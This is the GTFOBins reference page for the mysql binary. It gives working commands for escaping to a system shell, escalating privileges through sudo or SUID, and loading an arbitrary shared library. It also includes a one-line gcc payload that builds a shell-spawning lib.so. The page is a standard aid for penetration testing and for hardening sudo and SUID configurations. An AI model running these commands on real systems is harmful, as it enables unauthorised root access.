mysql | GTFOBins

.. / mysql

Sponsor Fork Star

Comment

A valid MySQL server must be available to connect to.

Shell

This executable can spawn an interactive system shell.

Unprivileged

This function can be performed by any unprivileged user.

mysql -e '\! /bin/sh'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

mysql -e '\! /bin/sh'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks

This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

mysql -e '\! /bin/sh'

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

Version requirements

5.5

Comment

The following loads the /path/to/lib.so shared object.

Unprivileged

This function can be performed by any unprivileged user.

mysql --default-auth ../../../../../path/to/lib

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

mysql --default-auth ../../../../../path/to/lib

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

mysql --default-auth ../../../../../path/to/lib

Payload

As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:

echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
    | gcc -w -fPIC -shared -o lib.so -x c -

Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.